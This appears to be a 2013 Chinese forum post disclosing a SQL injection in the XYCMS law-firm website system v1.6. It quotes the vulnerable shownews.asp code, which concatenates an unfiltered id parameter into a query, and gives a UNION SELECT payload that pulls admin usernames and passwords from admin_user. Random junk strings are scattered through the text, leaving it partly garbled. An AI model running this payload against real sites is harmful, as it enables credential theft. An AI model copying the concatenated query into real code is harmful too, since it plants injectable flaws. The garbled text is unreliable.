前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
5 A* w% v& K1 X- _9 V
8 I. n2 b$ o2 S7 ?淫荡分割线
, y7 l# ~9 \7 d' _$ {4 u' {$ E--------------------------------------------------------" S( R y' B6 Z0 n- A1 U( F
[, `: q, ~' j* k
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)$ U1 M. f1 N8 J+ G0 C6 Y- |
源码地址:http://down.chinaz.com/soft/29233.htm, ^# d; Y" l5 ^4 P! g
+ G' {( N# A( z2 j- Q& C& S; ~
漏洞文件:shownews.asp
1 S. K0 y7 b1 v) f9 [漏洞代码:7-13行
0 ^3 n- m2 C" M# S; G2 h - V7 @% P# ?! Z0 _( R% Y
5 @! c( M1 c8 C0 `. B+ ?' p
<%
3 c x7 U% m$ k$ i3 s+ j3 Mid=request.QueryString("id")/ d3 U7 R+ p4 b) F# a
9 V- p- m' K+ Hset snews=server.createobject("adodb.recordset") 0 D6 ^' { s. v* V' z
exec="select * from [news] where id="&id
# O, G. d$ Q9 d6 }snews.open exec,conn,1,1
- @2 l4 g Z0 X$ W%>
, {1 ?- _: ~# L- [3 R 5 t0 c/ r% ]3 ^
6 ?' u" j$ k8 d5 x( c: F. }$ j5 d. P什么过滤都没有 直造成注入2 S0 C |3 f: m
4 E3 R( O/ X" s* j( \! i, D3 q" c
注入点:http://127.0.0.1:99/shownews.asp?id=xx
; |* o" r3 G0 S1 G
+ R& ], S- t# y7 T5 P' u其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
' v% M% y# N4 d% q' k
' v' {* C4 `6 u& F: _ 0 K1 }' _4 S- x4 V5 c! M# u( N
exp: union select 1,admin,password,4,5,7 from admin_user
/ r: B5 P& q; _! V5 i. y6 `$ L/ Y8 O, [6 d
|
发表于 2013-4-4 17:28:12
收藏
支持
反对